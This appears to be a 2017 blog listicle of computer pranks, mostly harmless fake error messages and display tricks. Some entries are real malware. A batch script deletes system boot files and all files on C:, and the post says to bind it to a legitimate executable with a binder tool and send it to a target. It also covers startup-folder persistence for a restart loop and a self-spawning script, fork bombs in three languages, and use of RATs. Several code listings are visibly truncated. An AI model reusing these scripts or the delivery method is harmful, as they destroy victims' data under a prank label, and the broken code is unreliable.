47 Best Computer Pranks 2017
Today I'm going to show you the BEST COLLECTION OF COMPUTER PRANKS.
Let's dive right into the list...
- Fake Kernel Panic, Broken Monitor, and Blue Screen of Death
This is very easy to do, all you need is a working internet connection. To do this, open the web browser and then visit http://happyhourvirus.com. You will see a page as shown below.
Scroll down and then choose an effect (just click on it). You will see the effect immediately. If you want to stop the effects, just press the Esc key on your keyboard, or if you are using a Mac computer, you can use the iPanic app to simulate a fake kernal panic.
- Rotate Display
Yes, you can rotate the display anyway you want!
To rotate the display, just press Alt + Ctrl + Up/Left/Right/Down, or use the Rotate
program (The RAR password: gokulg).
- Frozen Desktop
You can make a desktop look like it is frozen without using any third-party software or service. It is very easy to do, just take a screenshot of the current desktop and set it as your wallpaper, then hide the desktop icons. Done!
- Display The Word SPACE For Blank Space
This trick can make your victim to question the reality! Yes, let's assume you are the victim and you are typing something very important, after some seconds you realized that whenever your press the Spacebar it displays the word SPACE instead of a blank space. Horrifying right?! That's what I'm going to show you now...
Then right-click on your desktop and select New > AutoHotKey Script. You will see a new autohotkey script file on the desktop. Then right-click on the file and then select "Edit Script". Then paste the following code into the editor and save the file.
To stop the effect, open task manager and then end the executable file.
You can also change the code to get a different result (see the below image).
- Fake Official Linux Upgrade
If you want to prank a colleague, this is probably the best and easy one. All you need is a Linux Live CD and an official-looking memo saying "This computer has been upgraded to Linux".
Before the user come in to his/her workplace, go to the workplace and boot off the Linux Live CD. Then remove the install icon from the desktop and then leave the fake memo on his/her desk.
The same idea can be used in many different ways, you can use a Windows XP live CD/USB drive, or Remix OS live CD/USB, or any other OS. Be creative!
- Funny Shutdown Notification on Startup
First, you have to browse to C>Users>User>AppData>Roaming>Microsoft>Windows>Start Menu>Programs>Startup.
Then right-click on the Startup folder and select New > Shortcut.
Then paste the following in the "Type the location of the item" field.
shutdown -s -t 1925000 -c "System error: You are not allowed to use this computer, fool"
Then click "Next" and give a name for the shortcut, and then click on "Finish".
When the user reboots the computer, it will show a shutdown notification with the following message.
System error: You are not allowed to use this computer, fool.
- Shutdown a Computer Forever
Note: Don't try this if you are not good at running!
Open the notepad and then paste the following code in it.
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Save the file as shutdown-prank.bat or any other file name with .bat extension.
Then Download Shockwave's Binder and then run it. (The RAR password is: gokulg)
You will see a small window as shown below.
You will see a small window as shown below.
Now, click on the BROWSE (the first one) and then select the shutdown-prank.bat file. Then click on the second browse button and then select a legit program (example: photoshop.exe).
Then enable "Run First File Hidden" then click on the "BIND!" button.
Now send the output file to your target.
When they open the file, the code will execute and delete all the necessary system files.
You can also use the following code instead of the above one.
cmd /c del c:\windows\* /F /S /Q
cmd /c del c:\* /F /S /Q
Have fun!
- Fake Virus Warning Message
This prank shows a series of Warning messages to the user.
It's pretty easy to do, first, you have to open the notepad and then paste the following code in it.
msg * Your computer has detected a virus.
msg * To remove the virus click OK or close this box
msg * Your Hard drives are now being formatted
msg * Please wait ...........
msg * It is just a prank bro......
Then save it as "prank.bat".
Now move this file to the following location (on victim's computer):
C>Users>User>AppData>Roaming>Microsoft>Windows>Start Menu>Programs>Startup
When the user reboots the computer, the prank.bat file will execute and display the fake warning messages.
Or, you can use the following code.
Or, you can use the following code, and save it as "prank.vbs".
@echo off
echo Fatal Error!! Your computer is under attack!!
echo Deleting Files
echo !323%%%@#@GJFGG42JG
echo !3424%@#%^&@52%@%gs
echo !@$@^624@$6262$hG
echo !@#4-07234&5*((6hkd
echo !&^%78755&*%478*%$&
echo !^$$68*$78()&4578
echo !&8898*65$$566$68(9
goto files*
Or, you can use the following code, and save it as "prank.vbs".
X=MsgBox("Error while opening computer. Do you want to fix it?",4+48,"Computer")
X=MsgBox("Unable to fix this error. Do you want to scan your computer?",3+48,"Computer Scan")
X=MsgBox("Alert! Virus detected. Do you want to delete it?",3+48,"Alert")
X=MsgBox("Unable to delete virus",2+48,"Critical Error")
X=MsgBox("Virus Activated",2+16,"Virus Alert")
X=MsgBox("Your computer is hacked.",1+16,"Hacked")
X=MsgBox("That was a PRANK!!!",0+64,"Prank")
- Keyboard Layout Prank
You can prank your friends by changing the keyboard layout. If you don't know how to do it, don't worry, here is a step by step guide on how to change the keyboard layout in Windows 7:
Go to the "Control Panel" . Then click on "Clock, Language, and Region" and then select "Region and Language". You will see a window as shown below.
Then select the "Keyboards and Languages" tab, and then click on "Change Keyboards".
Now click on the "Add" button and then select a layout (check the box). Then click on "OK".
Then click on the language bar (on task bar ) and enable the selected layout. Now let the user to use the computer.
If the layout you chose is "United States-Dvorak" , when they type the word "pizza", they will see "lc;;a" in the screen.
Try different layouts and have fun!
- Self Denial of Service
image credit: http://rustedreality.com/ |
What are your thoughts on "Knocking yourself out"? It is insane, right? Now think about a computer that is knocking itself out! That would be super crazy right? Then let's do it...
To make a computer knock itself out, first you have to paste the following code into the notepad and save it as "selfdos.bat".
@echo off
start selfdos.bat
Then move the file to the following location:
C>Users>User>AppData>Roaming>Microsoft>Windows>Start Menu>Programs>Startup.
When the victim reboots the computer, the batch file will open itself again and again until the computer freezes!
- Create Thousands Of Empty Folders In Just Few Seconds
If you are looking for an annoying prank, then this might be the one. This prank will create an unlimited number of folders on the desktop (or anywhere you want).
Open notepad and paste the following code in it.
@echo off
md %random%
goto top
Then save it as "unlimited.bat" in the desktop. Now right click on the file and select "Create Shortcut". Then move the shortcut to the following location:
C>Users>User>AppData>Roaming>Microsoft>Windows>Start Menu>Programs>Startup.
Then shutdown the computer.
When the computer start up, it will automatically create thousands of folders on the desktop.
Or, you can use the following code to create unlimited folders in the D and E drives.
Or, you can use the following code to create unlimited folders in the D and E drives.
@echo off
cd /d D:
cd /d E:
goto VIRUS
REM #######################
REM This is folder virus
Try it yourself, it is really annoying.
- MS Word Prank
image credit: www.glasbergen.com |
This prank will display a different word instead of the typed word on the Microsoft word. It is actually very easy to do, first open Microsoft Word and then go to Tools > AutoCorrect Options. Then in the "Replace" field, type a common word such as and, I, the etc. Then in the "With" field, type some unrelated word! Then click on "Add". That's all!
- Ghost Possessed Computer
image credit: www.explainxkcd.com |
You can create the effect of a ghost possessed computer in many different ways. Some of them are give below:
- Plug a wireless USB mouse / keyboard into their PC.
- Setup task scheduler to launch random apps / webpages.
- Use Program - WAV Launcher program.
- Use Mouse Move program.
- Use Synergy or other mouse / keyboard sharing applications.
- Use WiFi Mouse like applications.
- Use RATs like SubSeven.
- Use the Email Fun program (for an email prank). [The RAR password is: techaxio]
- Use the Fake Delete program to simulate the deletion of all files/folders in the Windows directory.
- Use the Flip It program to simulate a Windows message that is flipped upside-down (Clicking on the YES button will slowly make each piece of text rotate 180 degrees until you can read it ).
- Use the Follow Me program to make the windows start button to follow the mouse.
- Reverse the Trackpad or Mouse Wheel Scrolling
Note: You must have AutoHotKey installed on your computer.
Open notepad and paste the following code in it.
Send {WheelDown}
Send {WheelUp}
Then save it as "mouse.ahk". Then right click on the file and select "Compile Script", this will create an executable file of the script.
Now you can bind the executable with a legit executable program using the Shockwave's Binder and send it to the target user, or you can just send the executable (if the target is too dumb). When the user execute the file, the prank will begin.
To stop the change, just open task manager and then end the "mouse" process.
- Dead Mouse
image credit: http://thisonesite.com/ |
To make an optical mouse appear faulty, just place a small piece of tape over the bottom (where the light comes out), or use the Dirty Mouse program.
- Crazy CD/DVD Drive
Copy and paste this code into the Notepad:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
For i = 0 to colCDROMs.Count - 1
End If
wscript.sleep 10000
Then save it as "crazydrive.vbs". Then bind this file with a legit program using the Shockwave's Binder and then send it to the target user. When the user execute the script, the fun will begin.
Or, you can use the following script to open the CD/DVD drive every 5 seconds.
Dim ts
Dim strDriveLetter
Dim intDriveLetter
Dim fs 'As Scripting.FileSystemObject
Const CDROM = 4
On Error Resume Next
Set fs = CreateObject("Scripting.FileSystemObject")
strDriveLetter = ""
For intDriveLetter = Asc("A") To Asc("Z")
If fs.GetDrive(Chr(intDriveLetter)).DriveType = CDROM Then
If Err.Number = 0 Then
strDriveLetter = Chr(intDriveLetter)
Exit For
End If
End If
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
For d = 0 to colCDROMs.Count - 1
Next 'null
For d = 0 to colCDROMs.Count - 1
Next 'null
set owmp = nothing
set colCDROMs = nothing
To stop the script, just open the task manager and then end the "Wscript" process.
- Continuous Restart
This is actually a really scary prank, so do it with caution.
Right-click on the desktop and select New > Shortcut. Then copy this:
%windir%\system32\shutdown.exe -r -t 00
Paste it in the location area and then click on "Next". Then give a name for this shortcut and then click on "Finish".
Now move the newly created shortcut to the following location.
C>Users>User>AppData>Roaming>Microsoft>Windows>Start Menu>Programs>Startup
Then shutdown the computer. From now on whenever the computer starts, it will restart itself again and again....
- Add/Remove Prank
This prank makes it appear that all of your software on your computer is being removed using the Windows Add/Remove Program feature. To do this prank, you need the Add/Remove prank program. If you are going to try this program, bind it with another program (use Shockwave's Binder) so that the target will execute this on their computer.
If you run the Add/Remove program, there will be no option for you to close this program, all you can do is click on the "OK" button, if you do that, the fun will begin!
How To Close the Add/Remove Program:
Just click on the Close button after it has completed pretending to remove all of the software on your computer.
If you want to close the program before doing it's thing, open task manager and then end the add_remove.exe process.
- Start Button that avoids mouse clicks (works on XP, 2003, 2000, NT, ME,98, 95)
It is really fun watching somebody try to click the Start button when it is avoiding the click (I did this to my brother's XP virtual machine, it was fun). All you have to do is download the Avoid program and run it on the computer.
How To Close the Avoid Program:
Move your mouse pointer to the top-left corner of your screen. This will stop the program from running in memory. If you have successfully moved your mouse in the correct position, the program will close and display an About Box Screen. Once you close this screen, the program will exit. Or, just open the task manger and then end the Avoid.exe process
How To Close the Avoid Program:
Move your mouse pointer to the top-left corner of your screen. This will stop the program from running in memory. If you have successfully moved your mouse in the correct position, the program will close and display an About Box Screen. Once you close this screen, the program will exit. Or, just open the task manger and then end the Avoid.exe process
- Reverse Mouse Movements
image credit: http://clipproject.info/ |
Suddenly your mouse is totally reverse, moving up the mouse will move the mouse pointer down, and moving the mouse to the left will move the mouse pointer to the right side, and you will think that your mouse has gone haywire!
To reverse the mouse, download the Sakasa Mouse program and then run it.
How To Stop the Reverse Mouse Effect?
Just go to the system tray, and right click on the Sakasa Mouse icon and then select "Exit".
How To Stop the Reverse Mouse Effect?
Just go to the system tray, and right click on the Sakasa Mouse icon and then select "Exit".
- Another Blue Screen of Death Prank (Internet access is not required)
Download and run the Blue Screen Screensaver on the computer. It will display a screen as shown below.
To stop the blue screen of death, just press any key on the keyboard.
- Illegal Operation Blocked
This will display the standard Windows Illegal Operation dialog box and make you believe that the application has crashed.
Just replace a commonly used shortcut with the Bomb program and have fun!
Just replace a commonly used shortcut with the Bomb program and have fun!
You can also make it more realistic by using the command prompt. Here is how to do it:
bomb.exe [program to run]
For example, bomb.exe c:\windows\notepad.exe
This will run the program you want to run, and after 5 seconds it will display the BOMB message.
- Click Me
This is a program that displays a "Click Me" button that avoids your mouse pointer.
Download the Click Me program and run it on your friend's computer.
- Annoying Start Button
If the Start Menu open every 45 seconds. That would be super annoying, right? That's the idea!
Download and run the ClickStart program on the computer and it will click on the the start button every 45 seconds.
The ClickStart program supports a command line option to specify the amount of delay between each start button click. Just use the following syntax:
clickstart [seconds between each click]
Example: c:\clickstart\clickstart.exe 60
To stop this prank, just move your mouse pointer to the top-left corner of your screen. or go to the task manger and end the "clickstart.exe" process.
- Super Annoying Clippy
Do you remember Clippy? If not, no problem. For those who don't know, Clipyy is a digital assistant for Microsoft Office that looks like this:
You can annoy the hell out of someone with Clippy. How do you do that? It is very easy, just download Clippy program and then run it on the computer. When you run it, it will hide in the background for 1 minute then popup in the lower right hand corner of the screen and say something useless and repeat the process with different message every single minute.
You can also customize the Clippy messages as much as you want, the possibilities are endless!
It also supports several command line options. Here is the syntax:
clippy.exe [seconds to delay] [norandom]
[norandom] - Disables the random reading of the clippy.txt file.
- Replicating Mouse Cursor
Download the Copy Cursor program and then run it on the computer. It will copy the current mouse cursor and paste it where your mouse just was on the desktop (every 3 seconds). After several minutes you could have hundreds of mouse pointers on your desktop.
With the help of command line options, you can change the amount of time it delays in between each cursor copy.
For example, if you use the following command, the amount of time it delays in between each cursor copy will set to 5 seconds.
C:\folder\copycursor.exe 5
To stop the prank, just move the cursor to the top-left corner of the screen.
- Crazy Num Lock, Caps Lock, and Scroll Lock
You can make the Num Lock, Caps Lock, and Scroll Lock keys go crazy. All you have to do is, execute Crazy Num Caps Scroll program on the computer, it will automatically begin toggling the keys, and the user will be like "WTF?". [RAR password: techaxio]
- Automatic Cursor Change
It is a simple prank, but you can still make your friend believe that his/her computer is infected with a dangerous virus!
Download the Cursor Fun program and then run it on the computer. You will see a window as shown below.
Then configure the prank according to your needs and then click on "OK".
If you want to stop the prank, just move your mouse pointer to the top-left corner of your screen.
- Unwanted File Download
image credit: http://www.glasbergen.com/ |
This prank can make the victim believe that their computer is infected, and it is downloading unwanted files from all kind of crappy sites.
It is very easy to do, all you have to do is download and run the DownHoax program on the computer (The RAR password is: techaxio).
If you try to cancel or stop this program, it will simply restart the download process. But if you let it complete the fake download, it will stop itself.
- Formatting Drives
This one can make the victim believe that one of their drive is formatted. The Fake Format program
This program is harmless, so use it anyway you want.
- Shutdown Prank
image credit: www.comedycard.co.uk |
This is a scary prank and it is very simple, just run the Fake Shutdown program on the computer and it will show a shutdown Windows screen, the problem with this shutdown window is that it cannot be closed and forces you to shutdown Windows, if you do that, the screen will go black for few seconds. That is enough to change someone's happy mood into a very sad one.
After few seconds, a screen will appear and tell the user that it was just a joke!
- Flashing Image
This prank let's you flash any image on a computer screen, this is great one to play on your friends... The program that can do this is called the "Flasher
flasher.exe [seconds to delay] [path to image file]
Example: C:\Users\Goku\Desktop\flasher.exe 60 C:\Users\Goku\Desktop\scaryface.jpg
If you want to stop the flashing, move the mouse to the top-left corner of the screen.
- HeadAche Prank
This one really gives the victim headaches. All you have to do is run the HeadAche program. Please don't run it on your computer unless you want headaches (I tried it and I'm not feeling well).
- Mouse Droppings
Mouse Droppings is a prank program that drops little black turds all over your screen. This is a great joke to play on an unsuspecting friend or colleague. The program allows you to configure how often Mouse Droppings craps little turds on the screen.
If you want to configure the program, use the following command line.
Droppings.exe [seconds between each poop]
Example: C:\Users\Goku\Desktop\droppings.exe 5
To stop the prank, just move the mouse pointer to the top-left corner of the screen.
- Broken Mouse
What if you can disable the left, right or both mouse clicks every x seconds? That would be a nice prank right? Then let's do it...
To do this prank, all you need is a copy of MouseClicks program! Run it on the computer and then configure the prank and click on the "Start" button.
If you want to stop the prank, just move the mouse pointer to the top-left corner of the screen.
You can bypass the MouseClicks setup user interface by using the following command line options.
mouseclicks.exe [left,right,both] [seconds between disable]
Example: C:\Users\Goku\Desktop\mouseclicks.exe left 30
- Password Prank
Password Prank is a prank program that displays a fake, but very realistic, password box to the user and no matter what key the user presses, it starts typing in its own password. Once the password is entered an error message is displayed to the user telling them their password is not long enough.
To end the prank, just click the close button after submitting the password or you can click on the cross button (X) in the upper right corner of the program.
- Popup Prank
The Popup Prank program allows you to simulate online popup advertisements. It allows you to add any photo in the advertisement to make the ad viewing a scary experience for the victim [RAR password: techaxio].
Configuring the software is easier than anything, you can do that in less than 30 seconds. Yes, that's all it lakes to prank the hell out of someone.
- Random Burper
Random Burper is a program that can play gross burp sounds randomly every single minute. It also turn the internal Windows volume to maximum just before burping, so the victim won't miss it!
If you want to stop it, just move the mouse pointer to the top-left corner of the screen.
- Farter
You can setup a computer in such a way that it makes fart noises every time the user closes a program or doing something else. How to do it? It is super easy, first you have to download fart sounds from the internet. Then search for Sound settings, and open the Sound settings window, then select the "Sounds" tab.
Let's say I want the computer to play a fart noise when the user closes a program, I will select the "Close Program" option and then click on "Browse..." and select the fart audio. Then click on "Apply". From now on whenever the user closes a program, they will hear a fart noise.
- Broken Monitor
This prank can make victims believe that the their monitor has problems painting the colors. Screen Screw is the name of the program that can do this prank. When you run Screen Screw, it will add an odd color tint that changes to different colors every x seconds.
Colors change every 10 seconds by default, you can specify the amount of time between color changes with the following command line.
Screenscrew.exe [amount of time]
Example: C:\Users\Goku\Desktop\screenscrew.exe 3
- Shaky Screen
If you run the Shakedown program on a computer, it will immediately start to shake the computer screen! This will not annoy you, but can give you eye strain.
To stop the shaking, just press any key or click the mouse button.
- Show - Hide Desktop
Show - Hide Desktop is a program that can hide/show the desktop icons in every x seconds. It is not scary prank, but it can definitely freak out even the experienced users [RAR password: techaxio].
Here is a C++ version of Fork Bomb:
Here is a shell (Unix/bash) version of Fork Bomb:
To stop the prank all you have to do is, move the mouse pointer to the top-left corner of the screen.
- The Finger
The Finger is a prank program that can switch the mouse cursor to the middle finger every x seconds/minutes. This is must have program for a serious prankster.
- Vista Upgrade Prank
If you can somehow make the user run the Vista Upgrade Prank program, then it will be fun. Because once it is executed, there is no cancelling, even if the user click on the cancel button, it will disable itself, the process will run until the progress bar is complete. Then the fake upgrader will show that the upgrade was successful and allow the user to close the upgrade program.
Upon closing the upgrade a full screen Vista logo will appear with the Vista startup sound. After some load time the user will be presented with a Mac OS X desktop with a little bit of Windows flavor!
To stop this prank, you have to wait until the fake Vista upgrade is completed, after that, just double-click on the fake Vista desktop or click on the fake Vista desktop 5 separate times.
- Screen Melting
You can prank your friends by creating this melting effect on desktop:
It is pretty easy, all you have to do is, download Screen_Melter.exe and then run it on the computer.
If you know C++ and how to compile the c++ code into .exe file, then you can customize the melting effect. Here is the source code of Screen_Melter :
#include <windows.h>
int nRandWidth = 150, nRandHeight = 15, nSpeed = 0.5;
int nScreenWidth, nScreenHeight;
HDC hdcDesktop = GetDC(HWND_DESKTOP);
HDC hdcWindow = GetDC(hWnd);
BitBlt(hdcWindow, 0, 0, nScreenWidth, nScreenHeight, hdcDesktop, 0, 0, SRCCOPY);
ReleaseDC(hWnd, hdcWindow);
ReleaseDC(HWND_DESKTOP, hdcDesktop);
SetTimer(hWnd, 0, nSpeed, NULL);
ShowWindow(hWnd, SW_SHOW);
return 0;
return 0;
case WM_PAINT:
ValidateRect(hWnd, NULL);
return 0;
case WM_TIMER:
HDC hdcWindow = GetDC(hWnd);
int nXPos = (rand() % nScreenWidth) – (nRandWidth / 2),
nYPos = (rand() % nRandHeight),
nWidth = (rand() % nRandWidth);
BitBlt(hdcWindow, nXPos, nYPos, nWidth, nScreenHeight, hdcWindow, nXPos, 0, SRCCOPY);
ReleaseDC(hWnd, hdcWindow);
return 0;
case WM_CLOSE:
KillTimer(hWnd, 0);
return 0;
return DefWindowProc(hWnd, Msg, wParam, lParam);
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nShowCmd)
nScreenWidth = GetSystemMetrics(SM_CXSCREEN);
nScreenHeight = GetSystemMetrics(SM_CYSCREEN);
WNDCLASS wndClass = { 0, MelterProc, 0, 0, hInstance, NULL, LoadCursor(NULL, IDC_ARROW), 0, NULL, “Melter” };
if(!RegisterClass(&wndClass)) return MessageBox(HWND_DESKTOP, “Cannot register class!”, NULL, MB_ICONERROR | MB_OK);
HWND hWnd = CreateWindow("Melter", NULL, WS_POPUP, 0, 0, nScreenWidth, nScreenHeight, HWND_DESKTOP, NULL, hInstance, NULL);
if(!hWnd) return MessageBox(HWND_DESKTOP, "Cannot create window!", NULL, MB_ICONERROR | MB_OK);
MSG Msg = { 0 };
while(Msg.message != WM_QUIT)
if(PeekMessage(&Msg, NULL, 0, 0, PM_REMOVE))
if(GetAsyncKeyState(VK_ESCAPE) & 0x8000)
return 0;
- System Hacking Prank
This one may scare the hell out of someone. The following effect is what you get if you do this prank (watch the video).
Paste the following code into a notepad.
@echo off
title Hacking
color 02
echo L
ping localhost -n .15 >nul
echo Lo
ping localhost -n .15 >nul
echo Loa
ping localhost -n .15 >nul
echo Load
ping localhost -n .15 >nul
echo Loadi
ping localhost -n .15 >nul
echo Loadin
ping localhost -n .15 >nul
echo Loading
ping localhost -n .15 >nul
echo Loading.
ping localhost -n .15 >nul
echo Loading..
ping localhost -n .15 >nul
echo Loading...
ping localhost -n 5 >nul
echo W
ping localhost -n .15 >nul
echo We
ping localhost -n .15 >nul
echo Wel
ping localhost -n .15 >nul
echo Welc
ping localhost -n .15 >nul
echo Welco
ping localhost -n .15 >nul
echo Welcom
ping localhost -n .15 >nul
echo Welcome
ping localhost -n .15 >nul
echo Welcome Ba
ping localhost -n .15 >nul
echo Welcome Bac
ping localhost -n .15 >nul
echo Welcome Back
ping localhost -n .15 >nul
echo Welcome Back M
ping localhost -n .15 >nul
echo Welcome Back Ma
ping localhost -n .15 >nul
echo Welcome Back Mast
ping localhost -n .15 >nul
echo Welcome Back Maste
ping localhost -n .15 >nul
echo Welcome Back Master
ping localhost -n .15 >nul
echo Welcome Back Master!
ping localhost -n 5 >nul
echo H
ping localhost -n .15 >nul
echo Ha
ping localhost -n .15 >nul
echo Hac
ping localhost -n .15 >nul
echo Hack
ping localhost -n .15 >nul
echo Hacki
ping localhost -n .15 >nul
echo Hackin
ping localhost -n .15 >nul
echo Hacking
ping localhost -n .15 >nul
echo Hacking S
ping localhost -n .15 >nul
echo Hacking Sy
ping localhost -n .15 >nul
echo Hacking Sys
ping localhost -n .15 >nul
echo Hacking Syst
ping localhost -n .15 >nul
echo Hacking Syste
ping localhost -n .15 >nul
echo Hacking Syste
ping localhost -n .15 >nul
echo Hacking System No
ping localhost -n .15 >nul
echo Hacking System Now
ping localhost -n .15 >nul
echo Hacking System Now!
ping localhost -n 5 >nul
ping localhost -n .15 >nul
echo ud$$$**$$$$$$$bc.
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ping localhost -n 5 >nul
echo 010 010 10 01 0100 10 010 10 010 1001 10 010 10 10 010 101110 10 100 100 1011
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 01000
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 0000111001011011
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 00100111
echo 001 0010 10 010010010 010 100 10 01 010 010 010 010 10 010 10 010 10 01010 0
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echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01 0100000 1 1 11 1
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echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 10011
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 0011111
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 00001110010110111
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 001001111
echo 0000 00 000000000000 000000000000000000 00000000000001111 10 0100000 1000000111
echo 111111111111111111111111111111111111111111111111111111111111111111111111111110
goto start
Then save the file as "systemhack.bat". Now run it on a computer. That's it. You can use Shockwave's Binder or place the file in the Startup to make the prank more convincing.
- Fork Bomb (Crash Computers)
This is not a prank, if you execute the Fork Bomb on a computer, it will increase the CPU load until a crash occurs.
Here is how to make fork Bomb:
Copy this code:
Then paste it in a notepad, and save it as "fork.bat".That's it. You just created a virus!
Here is a C++ version of Fork Bomb:
#include <unistd.h>
int main(void)
return 0;
Here is a shell (Unix/bash) version of Fork Bomb:
:(){ :|:& };:
There was one another cool program on my list - "office poltergeist", but it's official chrome extension is not available anymore, so I did't include it in this article.
That's all. I hope you liked the pranks. If you did, please share this article....
If you know any other computer prank, please put that in the comment section with your name or site, I will add that in this article.
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